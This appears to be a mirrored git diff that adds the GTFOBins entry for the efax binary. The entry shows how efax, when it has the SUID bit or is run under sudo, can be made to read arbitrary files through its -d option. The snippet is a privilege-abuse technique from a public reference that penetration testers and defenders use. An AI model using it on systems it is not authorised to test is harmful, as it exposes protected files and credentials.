mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 17:44:49 +02:00
12
_gtfobins/efax.md
Normal file
12
_gtfobins/efax.md
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
description: The content is actually parsed by the command, thus it may not be suitable for reading arbitrary files.
|
||||||
|
functions:
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./efax -d "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo efax -d "$LFILE"
|
||||||
|
---
|
Reference in New Issue
Block a user